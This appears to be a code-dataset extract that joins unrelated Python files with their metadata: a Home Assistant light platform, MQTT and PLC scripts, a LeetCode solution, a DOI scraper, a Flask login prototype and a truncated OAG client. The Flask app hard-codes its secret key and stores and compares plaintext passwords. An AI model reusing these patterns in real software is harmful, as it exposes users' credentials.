def setup_platform(hass, config, add_devices, discovery_info=None):
logger = logging.getLogger(__name__)
devs = []
if ISY is None or not ISY.connected:
logger.error('A connection has not been made to the ISY controller.')
return False
for (path, node) in ISY.nodes:
if node.dimmable and SENSOR_STRING not in node.name:
if HIDDEN_STRING in path:
node.name += HIDDEN_STRING
devs.append(ISYLightDevice(node))
add_devices(devs)
class ISYLightDevice(ISYDeviceABC):
_domain = 'light'
_dtype = 'analog'
_attrs = {ATTR_BRIGHTNESS: 'value'}
_onattrs = [ATTR_BRIGHTNESS]
_states = [STATE_ON, STATE_OFF]
def _attr_filter(self, attr):
if ATTR_BRIGHTNESS in attr and not self.is_on:
del attr[ATTR_BRIGHTNESS]
return attr
| true | true |
f72615697ea7f0f72fe65505596ea4f2e3766a64 | 879 | py | Python | BAIT2123 Internet Of Things/Practical/Practical 7/test10.py | loozixuan/SoftwareSystemsDevelopment-Y2S1 | 98c74d191ad5655277b28849d0f63cd0400cee25 | [
"MIT"
] | 3 | 2021-12-22T11:23:45.000Z | 2022-01-06T04:31:08.000Z | BAIT2123 Internet Of Things/Practical/Practical 7/test10.py | loozixuan/SoftwareSystemsDevelopment-Y2S1 | 98c74d191ad5655277b28849d0f63cd0400cee25 | [
"MIT"
] | null | null | null | BAIT2123 Internet Of Things/Practical/Practical 7/test10.py | loozixuan/SoftwareSystemsDevelopment-Y2S1 | 98c74d191ad5655277b28849d0f63cd0400cee25 | [
"MIT"
] | null | null | null | #from time import *
from grovepi import *
from paho.mqtt.client import *
buzzer = 3
pinMode(buzzer, "OUTPUT")
MQTT_BROKER = "192.168.56.1" #The ip address will be vary based on where and how you connect to the Internet
#MQTT_BROKER = "broker.emqx.io" #using public mqtt broker to act as subsriber
MQTT_TOPIC = "test"
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
client.subscribe(MQTT_TOPIC)
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
try:
i = int(msg.payload)
print(i)
if i > 0 and i < 256:
analogWrite(buzzer, i)
except:
analogWrite(buzzer, 0)
client = Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect(MQTT_BROKER, 1883, 60)
client.loop_forever() | 29.3 | 109 | 0.653015 |
from grovepi import *
from paho.mqtt.client import *
buzzer = 3
pinMode(buzzer, "OUTPUT")
MQTT_BROKER = "192.168.56.1"
userdata, flags, rc):
print("Connected with result code " + str(rc))
client.subscribe(MQTT_TOPIC)
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
try:
i = int(msg.payload)
print(i)
if i > 0 and i < 256:
analogWrite(buzzer, i)
except:
analogWrite(buzzer, 0)
client = Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect(MQTT_BROKER, 1883, 60)
client.loop_forever() | true | true |
f7261569a905f945bb952e0e026fd7beb779ab12 | 491 | py | Python | examples/10_write_simple.py | drbitboy/pylogix | 6204f8e288276f407763d56fa0801355daf115a6 | [
"Apache-2.0"
] | 350 | 2016-07-26T20:50:26.000Z | 2022-03-28T09:22:33.000Z | examples/10_write_simple.py | drbitboy/pylogix | 6204f8e288276f407763d56fa0801355daf115a6 | [
"Apache-2.0"
] | 175 | 2016-11-16T21:39:25.000Z | 2022-03-15T04:40:00.000Z | examples/10_write_simple.py | drbitboy/pylogix | 6204f8e288276f407763d56fa0801355daf115a6 | [
"Apache-2.0"
] | 174 | 2016-07-25T20:51:37.000Z | 2022-03-30T01:29:03.000Z | '''
the following import is only necessary because eip is not in this directory
'''
import sys
sys.path.append('..')
'''
The simplest example of writing a tag from a PLC
NOTE: You only need to call .Close() after you are done exchanging
data with the PLC. If you were going to read/write in a loop or read/write
more tags, you wouldn't want to call .Close() every time.
'''
from pylogix import PLC
comm = PLC()
comm.IPAddress = '192.168.1.9'
comm.Write('CurrentScreen', 10)
comm.Close()
| 24.55 | 75 | 0.723014 | import sys
sys.path.append('..')
from pylogix import PLC
comm = PLC()
comm.IPAddress = '192.168.1.9'
comm.Write('CurrentScreen', 10)
comm.Close()
| true | true |
f7261575ae40a5abf038212e2c31908273819413 | 745 | py | Python | app/urls.py | forestbaba/recipe-app-api | 72471dd6a8ad5993a71ae6648026d0d1def5d03d | [
"MIT"
] | 11 | 2018-06-19T01:32:59.000Z | 2022-01-28T13:41:20.000Z | app/urls.py | forestbaba/recipe-app-api | 72471dd6a8ad5993a71ae6648026d0d1def5d03d | [
"MIT"
] | 8 | 2019-06-11T02:44:04.000Z | 2022-02-10T11:55:20.000Z | app/urls.py | forestbaba/recipe-app-api | 72471dd6a8ad5993a71ae6648026d0d1def5d03d | [
"MIT"
] | 2 | 2020-07-04T14:14:46.000Z | 2021-10-04T11:22:50.000Z | """app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 33.863636 | 77 | 0.707383 | from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| true | true |
f72615d8349f0df9ace6524c51601bcc14b49239 | 1,472 | py | Python | toTheMoon/leetcode_115_DistinctSubsequences.py | jercas/offer66-leetcode-newcode | a2e5256f27dbfb23fc34119fc857cd9b00e28c03 | [
"MIT"
] | null | null | null | toTheMoon/leetcode_115_DistinctSubsequences.py | jercas/offer66-leetcode-newcode | a2e5256f27dbfb23fc34119fc857cd9b00e28c03 | [
"MIT"
] | null | null | null | toTheMoon/leetcode_115_DistinctSubsequences.py | jercas/offer66-leetcode-newcode | a2e5256f27dbfb23fc34119fc857cd9b00e28c03 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 15 15:37:49 2019
@author: jercas
"""
"""
leetcode-115: 不同的子序列 HARD
'动态规划' '字符串'
给定一个字符串 S 和一个字符串 T,计算在 S 的子序列中 T 出现的个数。
一个字符串的一个子序列是指,通过删除一些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。
(例如,"ACE" 是 "ABCDE" 的一个子序列,而 "AEC" 不是)
___ 0
|true
i < j ? - ____ 1 ____ sum(i-1, j)
|___|j==0 |false
|____ S[i] == T[j] ? -
|____ sum(i-1, j) + sum(i-1,j-1)
"""
class Solution:
    def numDistinct(self, s: str, t: str) -> int:
        """Count the distinct subsequences of *s* that equal *t* (LeetCode 115).

        ``dictChars`` maps each character of *t* to the list of prefixes of
        *t* that precede it; ``dictTimes`` counts how many ways each prefix
        of *t* can be formed from the part of *s* scanned so far. Scanning
        *s* left to right, each occurrence of a character extends every
        prefix it may follow; iterating those prefixes longest-first keeps a
        single character of *s* from being counted twice in one step.
        """
        dictTimes = {}
        dictChars = {}
        for i in range(len(t)):
            if t[i] in dictChars:
                dictChars[t[i]].append(t[:i])
            else:
                dictChars[t[i]] = [t[:i]]
        for i in range(1, len(t) + 1):
            dictTimes[t[:i]] = 0
        dictTimes[''] = 1  # the empty prefix is always formable exactly once
        for char in s:
            if char in dictChars:
                # Longest prefixes first so this char is not reused within
                # the same scan position.
                for c in dictChars[char][::-1]:
                    if dictTimes[c] > 0:
                        dictTimes[c + char] += dictTimes[c]
        # Removed a leftover debug print of dictChars/dictTimes.
        return dictTimes[t]
if __name__ == "__main__":
S = ["rabbbit", "babgbag"]
T = ["rabbit", "bag"]
A = [3, 5]
solution = Solution()
for i in range(len(S)):
if solution.numDistinct(S[i], T[i]) == A[i]:
print("AC") | 29.44 | 75 | 0.432745 |
class Solution:
def numDistinct(self, s: str, t: str) -> int:
dictTimes = {}
dictChars = {}
for i in range(len(t)):
if t[i] in dictChars:
dictChars[t[i]].append(t[:i])
else:
dictChars[t[i]] = [t[:i]]
for i in range(1, len(t)+1):
dictTimes[t[:i]] = 0
dictTimes[''] = 1
for char in s:
if char in dictChars:
for c in dictChars[char][::-1]:
if dictTimes[c] > 0:
dictTimes[c+char] += dictTimes[c]
print(dictChars, '\n',dictTimes)
return dictTimes[t]
if __name__ == "__main__":
S = ["rabbbit", "babgbag"]
T = ["rabbit", "bag"]
A = [3, 5]
solution = Solution()
for i in range(len(S)):
if solution.numDistinct(S[i], T[i]) == A[i]:
print("AC") | true | true |
f72615e0cd1ac3bf0fced183806639408d1edf2d | 3,061 | py | Python | getdoi/getDOIFromURL/science.py | YutoMizutani/getdoi | cf4e1a2bebe2d6cd9f534221a965d6153974f495 | [
"MIT"
] | null | null | null | getdoi/getDOIFromURL/science.py | YutoMizutani/getdoi | cf4e1a2bebe2d6cd9f534221a965d6153974f495 | [
"MIT"
] | null | null | null | getdoi/getDOIFromURL/science.py | YutoMizutani/getdoi | cf4e1a2bebe2d6cd9f534221a965d6153974f495 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# === About ============================================================================================================
"""
science.py
Copyright © 2017 Yuto Mizutani.
This software is released under the MIT License.
Version: 1.0.0
TranslateAuthors: Yuto Mizutani
E-mail: yuto.mizutani.dev@gmail.com
Website: http://operantroom.com
Created: 2017/12/09
Device: MacBook Pro (Retina, 13-inch, Mid 2015)
OS: macOS Serria version 10.12.6
IDE: PyCharm Community Edition 2017.2.4
Python: 3.6.1
"""
# --- References ---
# --- notes ---
# --- Information ---
# --- Circumstances ---
# === import ===========================================================================================================
""" Standard library """
""" Third party library """
""" Local library """
from .gettableDOI import GettableDOI
from getdoi.scraping.beautifulSoupModel import BeautifulSoupModelImpl
# === CONSTANTS ========================================================================================================
# === User Parameters ==================================================================================================
# === variables ========================================================================================================
# ======================================================================================================================
class Science(GettableDOI):
    """DOI resolver for articles hosted on science.sciencemag.org."""
    # Example:
    #   http://science.sciencemag.org/content/309/5732/3106
    #   -> 10.1126/science.1114519
    # -- constants --
    JOURNAL_URL = 'science.sciencemag.org'
    JOURNAL_STR = 'Science'
    DOI_KEY = 'DOI: '
    DOI_URL = "https://doi.org/"
    DOI_STR = 'doi: '
    META_KEY = 'name'       # <meta> attribute name to match
    META_ID = 'citation_doi'  # <meta> attribute value holding the DOI
    # (Translated) Note: Nature, by contrast, only lists its DOI as plain
    # text, e.g. "doi:10.1038/79951".
    # -- controller --
    def get(self, *, url)->str or None:
        """Alias for get_url (the default DOI format for this journal)."""
        return self.get_url(url=url)
    def get_url(self, *, url)->str or None:
        """return a full URL link"""
        """(Translated) Read the DOI from the page; it lives in a <meta> tag."""
        soup = BeautifulSoupModelImpl()
        raw_doi = soup.get_meta_content(url=url, key=self.META_KEY, id=self.META_ID)
        if raw_doi is not None:
            doi_url = self.__translate_url(raw_doi=raw_doi)
            return doi_url
        else:
            print('Any DOI found from {journal} ({link})'.format(journal=self.JOURNAL_STR, link=url))
            return None
    def get_prev_format(self, *, url)->str or None:
        """Return the DOI in the legacy text format: 'doi: <doinumber>'."""
        doi_url = self.get_url(url=url)
        if doi_url is None:
            return None
        else:
            return self.__translate_prev_format(doi_url=doi_url)
    # -- translator --
    def __translate_url(self, *, raw_doi):
        """(Translated) Prepend https://doi.org/ to a raw DOI such as 10.1126/science.1114519."""
        return self.DOI_URL+raw_doi
    def __translate_prev_format(self, *, doi_url):
        """(Translated) Strip https://doi.org/ from the URL and prepend 'doi: '."""
        return self.DOI_STR+doi_url.replace(self.DOI_URL, '')
| 32.913978 | 120 | 0.49951 |
from .gettableDOI import GettableDOI
from getdoi.scraping.beautifulSoupModel import BeautifulSoupModelImpl
class Science(GettableDOI):
JOURNAL_URL = 'science.sciencemag.org'
JOURNAL_STR = 'Science'
DOI_KEY = 'DOI: '
DOI_URL = "https://doi.org/"
DOI_STR = 'doi: '
META_KEY = 'name'
META_ID = 'citation_doi'
def get(self, *, url)->str or None:
return self.get_url(url=url)
def get_url(self, *, url)->str or None:
soup = BeautifulSoupModelImpl()
raw_doi = soup.get_meta_content(url=url, key=self.META_KEY, id=self.META_ID)
if raw_doi is not None:
doi_url = self.__translate_url(raw_doi=raw_doi)
return doi_url
else:
print('Any DOI found from {journal} ({link})'.format(journal=self.JOURNAL_STR, link=url))
return None
def get_prev_format(self, *, url)->str or None:
doi_url = self.get_url(url=url)
if doi_url is None:
return None
else:
return self.__translate_prev_format(doi_url=doi_url)
def __translate_url(self, *, raw_doi):
return self.DOI_URL+raw_doi
def __translate_prev_format(self, *, doi_url):
return self.DOI_STR+doi_url.replace(self.DOI_URL, '')
| true | true |
f72616177243550a1e3e7b68785b0d0fd43a39d3 | 8,412 | py | Python | Intent Recognition Protoype/app.py | AndBuch/intent-recognition-for-dialogs | 1a0bdfc8f36cf31e097a662c86f671bb5c820bc1 | [
"MIT"
] | null | null | null | Intent Recognition Protoype/app.py | AndBuch/intent-recognition-for-dialogs | 1a0bdfc8f36cf31e097a662c86f671bb5c820bc1 | [
"MIT"
] | null | null | null | Intent Recognition Protoype/app.py | AndBuch/intent-recognition-for-dialogs | 1a0bdfc8f36cf31e097a662c86f671bb5c820bc1 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, url_for, request, redirect, session
from flask_sqlalchemy import SQLAlchemy
import uuid
import wave
from flask_socketio import emit, SocketIO
from datetime import datetime
import database_custom
import os
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on installed packages.
async_mode = None
# Absolute directory of this file (used later to locate the audio/ folder).
dir_path = os.path.dirname(os.path.realpath(__file__))
# Create the Flask application and wrap it with SocketIO.
app = Flask(__name__)
# NOTE(review): hard-coded secret key — load from env/config before deploying.
app.secret_key = "hello"
socketio = SocketIO(app)
# Define the names of the databases and create the databases (saved into same directory as app.py)
db_names = ['main', 'user']
# NOTE(review): db_keys appears unused in this module — confirm before removing.
db_keys = {'user'}
database_custom.CreateDatabase(db_names)
# Bind databases to application
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///main.db' # first database to connect to
app.config['SQLALCHEMY_BINDS'] = {'user': 'sqlite:///user.db'} # dictionary that holds additional databases
db = SQLAlchemy(app) # initialize DB with app
# Create tables and their columns
class Main(db.Model):
    """Task table in the primary ("main") database: one row per entry."""
    id = db.Column(db.Integer, primary_key = True)
    content = db.Column(db.String(200), nullable = False) # String(length in character), nullable = can be empty?
    # presumably 0 = not completed — TODO confirm against the templates
    completed = db.Column(db.Integer, default = 0)
    date_created = db.Column(db.DateTime, default = datetime.utcnow) # Default = if entry is created automatically create datetime
    def __repr__(self):
        return '<Task %r>' %self.id
class User(db.Model):
    """Login credentials table, stored in the secondary "user" database."""
    __bind_key__ = 'user'  # routes this model to the 'user' bind configured above
    id = db.Column(db.Integer, primary_key = True)
    users = db.Column(db.String(200), nullable = False)
    # NOTE(review): passwords are stored in plaintext — hash (e.g. werkzeug.security)
    # before production use.
    password = db.Column(db.String(200), nullable = False)
    date_created = db.Column(db.DateTime, default = datetime.utcnow)
database_custom.CreateTables(db) # Create tables using the function in database.py
'''
----------------------------------------------------------------------------------
INDEX-Page
----------------------------------------------------------------------------------
'''
@app.route('/', methods = ['POST', 'GET'])
def index():
    """Index page.

    POST: create a new task from the submitted "content" field.
    GET:  render the page with all tasks ordered by creation date.
    """
    if request.method == 'POST':
        task_content = request.form['content']
        new_task = Main(content = task_content)
        try:
            db.session.add(new_task)
            db.session.commit()
            return redirect('/')
        except Exception:
            # Narrowed from a bare `except:` (which would also swallow
            # KeyboardInterrupt/SystemExit); user-facing message unchanged.
            return "There was an issue with your request"
    else:
        tasks = Main.query.order_by(Main.date_created).all()
        return render_template('index.html', tasks = tasks)
    # (removed an unreachable trailing `return render_template('index.html')`:
    # both branches above already return)
'''
----------------------------------------------------------------------------------
HOME-Page
----------------------------------------------------------------------------------
'''
@app.route('/home', methods = ['POST', 'GET'])
def home():
    """Home/login page.

    POST: stash the submitted credentials in the session and forward to the
    login check.  GET: render the page with all tasks.
    """
    if request.method == 'POST':
        session['user'] = request.form['user']
        session['password'] = request.form['password']
        return redirect(url_for("portallogin"))
    else:
        tasks = Main.query.order_by(Main.date_created).all()
        return render_template('home.html', tasks = tasks)
    # (removed an unreachable trailing `return render_template('home.html')`:
    # both branches above already return)
'''
----------------------------------------------------------------------------------
PORTAL-Login Procedure
----------------------------------------------------------------------------------
'''
@app.route('/portallogin', methods = ['POST', 'GET'])
# Validates the credentials previously stored in the session by home().
def portallogin():
    """Check session credentials against the User table and open a portal session."""
    if "user" in session:
        user = session["user"]
        password = session['password']
        # Look up the first matching user row, then compare passwords.
        # NOTE(review): passwords are compared in plaintext — switch to a
        # salted hash comparison before production.
        found_user = User.query.filter_by(users = user).first()
        if found_user and password == found_user.password:
            session["login"] = True
            return redirect(url_for('portalrecord'))
        else:
            return redirect(url_for('home'))
    else:
        # No credentials in the session at all — back to the login page.
        return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
PORTAL-Dialog Player Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_record', methods = ['POST', 'GET'])
def portalrecord():
    """Serve the recording portal page; unauthenticated users go home."""
    logged_in = "user" in session and session["login"] == True
    if not logged_in:
        return redirect(url_for('home'))
    return render_template('portal.html')
@app.route('/uploads', methods=['POST'])
def save_audio():
    """Persist the raw POSTed audio bytes to RecordedFile.wav.

    Returns an empty 204 response.  The original implicitly returned None,
    which Flask rejects at request time, and never closed the file on error.
    """
    print("got new audio file")
    raw_audio = request.get_data()
    # Context manager guarantees the handle is closed even if write() fails.
    with open('RecordedFile.wav', 'wb') as audio_file:
        audio_file.write(raw_audio)
    return '', 204
'''
----------------------------------------------------------------------------------
PORTAL-Dialog Player Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_dialog', methods = ['POST', 'GET'])
def portaldialog():
    """Serve the dialog-player portal page; unauthenticated users go home."""
    is_logged_in = "user" in session and session["login"] == True
    return render_template('portal_dialog player.html') if is_logged_in else redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
PORTAL-Statistics Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_statistics', methods = ['POST', 'GET'])
def portalstatistics():
    """Serve the statistics portal page; unauthenticated users go home."""
    if "user" not in session or session["login"] != True:
        return redirect(url_for('home'))
    return render_template('portal_statistics.html')
'''
----------------------------------------------------------------------------------
PORTAL-Intent Checker Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_check', methods = ['POST', 'GET'])
def portalcheck():
    """Serve the intent-checker portal page; unauthenticated users go home."""
    authorised = "user" in session and session["login"] == True
    if not authorised:
        return redirect(url_for('home'))
    return render_template('portal_intent checker.html')
'''
----------------------------------------------------------------------------------
PORTAL-Logout Procedure
----------------------------------------------------------------------------------
'''
@app.route('/portallogout', methods = ['POST', 'GET'])
def portallogout():
    """Log the user out and return to the home page.

    The original removed only "user", leaving the plaintext password and the
    "login" flag behind in the session cookie; clear all three.
    """
    for key in ("user", "password", "login"):
        session.pop(key, None)
    return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
AUDIO-Recorder
----------------------------------------------------------------------------------
'''
@socketio.on('start-recording')
def start_recording(options):
    """Open a new server-side WAV file and stash the writer in the session.

    The audio format (channels, bits per sample, frame rate) comes from the
    client-supplied *options*, with fallbacks of 1 / 16 / 44100.
    """
    print('started recording')
    recording_id = uuid.uuid4().hex  # server-side filename
    session['wavename'] = recording_id + '.wav'
    target_path = dir_path + '/audio/' + session['wavename']
    writer = wave.open(target_path, 'wb')
    writer.setnchannels(options.get('numChannels', 1))
    writer.setsampwidth(options.get('bps', 16) // 8)
    writer.setframerate(options.get('fps', 44100))
    session['wavefile'] = writer
@socketio.on('write-audio')
def write_audio(data):
    """Append one chunk of client audio to the open WAV file."""
    print("write data")
    session['wavefile'].writeframes(data)
@socketio.on('end-recording')
def end_recording():
    print("end recording")
    """Stop recording audio from the client."""
    # NOTE(review): `audio_path` is passed as a keyword argument to emit();
    # Flask-SocketIO's emit() does not define such a keyword — confirm the
    # client actually receives this value (the event may be sent with no data).
    emit('add-wavefile', audio_path = dir_path + '/audio/' + session['wavename'])
    # Close and discard the per-session WAV writer created by start_recording.
    session['wavefile'].close()
    del session['wavefile']
    del session['wavename']
'''
----------------------------------------------------------------------------------
For debugging
----------------------------------------------------------------------------------
'''
if __name__ == "__main__":
    # Run under the SocketIO server (not app.run) so websocket events work.
    socketio.run(app, debug=True)
| 30.042857 | 133 | 0.526153 | from flask import Flask, render_template, url_for, request, redirect, session
from flask_sqlalchemy import SQLAlchemy
import uuid
import wave
from flask_socketio import emit, SocketIO
from datetime import datetime
import database_custom
import os
async_mode = None
dir_path = os.path.dirname(os.path.realpath(__file__))
app = Flask(__name__)
app.secret_key = "hello"
socketio = SocketIO(app)
db_names = ['main', 'user']
db_keys = {'user'}
database_custom.CreateDatabase(db_names)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///main.db'
app.config['SQLALCHEMY_BINDS'] = {'user': 'sqlite:///user.db'}
db = SQLAlchemy(app)
class Main(db.Model):
id = db.Column(db.Integer, primary_key = True)
content = db.Column(db.String(200), nullable = False)
completed = db.Column(db.Integer, default = 0)
date_created = db.Column(db.DateTime, default = datetime.utcnow)
def __repr__(self):
return '<Task %r>' %self.id
class User(db.Model):
__bind_key__ = 'user'
id = db.Column(db.Integer, primary_key = True)
users = db.Column(db.String(200), nullable = False)
password = db.Column(db.String(200), nullable = False)
date_created = db.Column(db.DateTime, default = datetime.utcnow)
database_custom.CreateTables(db)
@app.route('/', methods = ['POST', 'GET'])
def index():
if request.method == 'POST':
task_content = request.form['content']
new_task = Main(content = task_content)
try:
db.session.add(new_task)
db.session.commit()
return redirect('/')
except:
return "There was an issue with your request"
else:
tasks = Main.query.order_by(Main.date_created).all()
return render_template('index.html', tasks = tasks)
return render_template('index.html')
@app.route('/home', methods = ['POST', 'GET'])
def home():
if request.method == 'POST':
user = request.form['user']
password = request.form['password']
session['user'] = user
session['password'] = password
return redirect(url_for("portallogin"))
else:
tasks = Main.query.order_by(Main.date_created).all()
return render_template('home.html', tasks = tasks)
return render_template('home.html')
@app.route('/portallogin', methods = ['POST', 'GET'])
def portallogin():
if "user" in session:
user = session["user"]
password = session['password']
found_user = User.query.filter_by(users = user).first()
if found_user and password == found_user.password:
session["login"] = True
return redirect(url_for('portalrecord'))
else:
return redirect(url_for('home'))
else:
return redirect(url_for('home'))
@app.route('/portal_record', methods = ['POST', 'GET'])
def portalrecord():
if "user" in session and session["login"] == True:
return render_template('portal.html')
else:
return redirect(url_for('home'))
@app.route('/uploads', methods=['POST'])
def save_audio():
print("got new audio file")
rawAudio = request.get_data()
audioFile = open('RecordedFile.wav', 'wb')
audioFile.write(rawAudio)
audioFile.close()
@app.route('/portal_dialog', methods = ['POST', 'GET'])
def portaldialog():
if "user" in session and session["login"] == True:
return render_template('portal_dialog player.html')
else:
return redirect(url_for('home'))
@app.route('/portal_statistics', methods = ['POST', 'GET'])
def portalstatistics():
if "user" in session and session["login"] == True:
return render_template('portal_statistics.html')
else:
return redirect(url_for('home'))
@app.route('/portal_check', methods = ['POST', 'GET'])
def portalcheck():
if "user" in session and session["login"] == True:
return render_template('portal_intent checker.html')
else:
return redirect(url_for('home'))
@app.route('/portallogout', methods = ['POST', 'GET'])
def portallogout():
session.pop("user", None)
return redirect(url_for('home'))
@socketio.on('start-recording')
def start_recording(options):
print('started recording')
id = uuid.uuid4().hex
session['wavename'] = id + '.wav'
audio_path = dir_path + '/audio/' + session['wavename']
wf = wave.open(audio_path, 'wb')
wf.setnchannels(options.get('numChannels', 1))
wf.setsampwidth(options.get('bps', 16) // 8)
wf.setframerate(options.get('fps', 44100))
session['wavefile'] = wf
@socketio.on('write-audio')
def write_audio(data):
print("write data")
session['wavefile'].writeframes(data)
@socketio.on('end-recording')
def end_recording():
print("end recording")
emit('add-wavefile', audio_path = dir_path + '/audio/' + session['wavename'])
session['wavefile'].close()
del session['wavefile']
del session['wavename']
if __name__ == "__main__":
socketio.run(app, debug=True)
| true | true |
f72616de29779e50da24b38a39bb7a37b89fe8df | 325 | py | Python | p_var.py | PacktPublishing/Packt | 790c5a01eba5979ba4f22392538197981cb10447 | [
"MIT"
] | null | null | null | p_var.py | PacktPublishing/Packt | 790c5a01eba5979ba4f22392538197981cb10447 | [
"MIT"
] | null | null | null | p_var.py | PacktPublishing/Packt | 790c5a01eba5979ba4f22392538197981cb10447 | [
"MIT"
] | null | null | null | class car:
__topspeed = 0
__name=""
def __init__(self):
self.__topspeed=250
self.name="SAM"
def drive(self):
print("Drive Top Speed=" +str(self.__topspeed))
def setTopSpeed(self,speed):
self.__topspeed=speed
# Demo: drive at the default speed, then again after raising it via the setter.
volvo=car()
volvo.drive()
volvo.setTopSpeed(380)
volvo.drive() | 17.105263 | 55 | 0.627692 | class car:
__topspeed = 0
__name=""
def __init__(self):
self.__topspeed=250
self.name="SAM"
def drive(self):
print("Drive Top Speed=" +str(self.__topspeed))
def setTopSpeed(self,speed):
self.__topspeed=speed
volvo=car()
volvo.drive()
volvo.setTopSpeed(380)
volvo.drive() | true | true |
f72616faa0a3c1aea2a3297fcae2f7c444a7134b | 12,820 | py | Python | octopus/modules/oag/client.py | CottageLabs/magnificent-octopus-oacwellcome-fork | b1c8c412cf9a3fe66fca1c8e92ed074c9821663e | [
"Apache-2.0"
] | 2 | 2016-02-22T04:31:30.000Z | 2021-08-03T23:58:36.000Z | octopus/modules/oag/client.py | CottageLabs/magnificent-octopus-oacwellcome-fork | b1c8c412cf9a3fe66fca1c8e92ed074c9821663e | [
"Apache-2.0"
] | 9 | 2015-01-04T14:00:05.000Z | 2021-12-13T19:35:07.000Z | octopus/modules/oag/client.py | CottageLabs/magnificent-octopus-oacwellcome-fork | b1c8c412cf9a3fe66fca1c8e92ed074c9821663e | [
"Apache-2.0"
] | 3 | 2016-09-09T13:39:45.000Z | 2018-02-19T14:23:12.000Z | from datetime import datetime, timedelta
import json, requests, time, sys, uuid
from copy import deepcopy
from octopus.core import app
from octopus.lib import http
class RequestState(object):
_timestamp_format = "%Y-%m-%dT%H:%M:%SZ"
def __init__(self, identifiers, timeout=None, back_off_factor=None, max_back_off=None, max_retries=None, batch_size=None, start=None):
self.id = uuid.uuid4().hex
self.success = {}
self.error = {}
self.pending = {}
self.maxed = {}
self.success_buffer = []
self.error_buffer = []
self.start = datetime.utcnow() if start is None else start
if timeout is None:
timeout = app.config.get("OAG_STATE_DEFAULT_TIMEOUT")
self.timeout = self.start + timedelta(seconds=timeout) if timeout is not None else None
if back_off_factor is None:
back_off_factor = app.config.get("OAG_STATE_BACK_OFF_FACTOR", 1)
self.back_off_factor = back_off_factor
if max_back_off is None:
max_back_off = app.config.get("OAG_STATE_MAX_BACK_OFF", 120)
self.max_back_off = max_back_off
if max_retries is None:
max_retries = app.config.get("OAG_STATE_MAX_RETRIES", None)
self.max_retries = max_retries
if batch_size is None:
batch_size = app.config.get("OAG_STATE_BATCH_SIZE", 1000)
self.batch_size = batch_size
for ident in identifiers:
self.pending[ident] = {"init" : self.start, "due" : self.start, "requested" : 0}
def print_parameters(self):
params = "Timeout: " + str(self.timeout) + "\n"
params += "Back Off Factor: " + str(self.back_off_factor) + "\n"
params += "Max Back Off: " + str(self.max_back_off) + "\n"
params += "Max Tries per Identifier: " + str(self.max_retries) + "\n"
params += "Batch Size: " + str(self.batch_size)
return params
def print_status_report(self):
status = str(len(self.success.keys())) + " received; " + \
str(len(self.error.keys())) + " errors; " + \
str(len(self.pending.keys())) + " pending; " + \
str(len(self.maxed.keys())) + " maxed"
return status
def finished(self):
if len(self.pending.keys()) == 0:
return True
if self.timeout is not None:
if datetime.utcnow() > self.timeout:
return True
return False
def get_due(self):
now = datetime.utcnow()
return [p for p in self.pending.keys() if self.pending[p].get("due") < now]
def next_due(self):
earliest = None
for p, o in self.pending.iteritems():
if earliest is None or o.get("due") < earliest:
earliest = o.get("due")
return earliest
def _record_maxed(self, id):
self.maxed[id] = self.pending[id]
del self.pending[id]
if "due" in self.maxed[id]:
del self.maxed[id]["due"]
def record_requested(self, identifiers):
for id in identifiers:
if id in self.pending:
self.pending[id]["requested"] += 1
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
else:
print "ERROR: id {id} is not in the pending list".format(id=id)
def record_result(self, result):
now = datetime.utcnow()
successes = result.get("results", [])
errors = result.get("errors", [])
processing = result.get("processing", [])
for s in successes:
id = s.get("identifier")[0].get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.success[id] = deepcopy(ourrecord)
self.success[id]["requested"] += 1
self.success[id]["found"] = now
del self.success[id]["due"]
del self.pending[id]
self.success_buffer.extend(successes)
for e in errors:
id = e.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.error[id] = deepcopy(ourrecord)
self.error[id]["requested"] += 1
self.error[id]["found"] = now
del self.error[id]["due"]
del self.pending[id]
self.error_buffer.extend(errors)
for p in processing:
id = p.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "ERROR: No record of pending id " + id
continue
self.pending[id]["requested"] += 1
self.pending[id]["due"] = self._backoff(self.pending[id]["requested"])
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
def flush_success(self):
buffer = self.success_buffer
self.success_buffer = []
return buffer
def flush_error(self):
buffer = self.error_buffer
self.error_buffer = []
return buffer
@classmethod
def from_json(cls, j):
state = RequestState([])
state.id = j.get("id")
if j.get("timetout"):
state.timeout = datetime.strptime(j.get("timeout"), cls._timestamp_format)
state.start = datetime.strptime(j.get("start"), cls._timestamp_format)
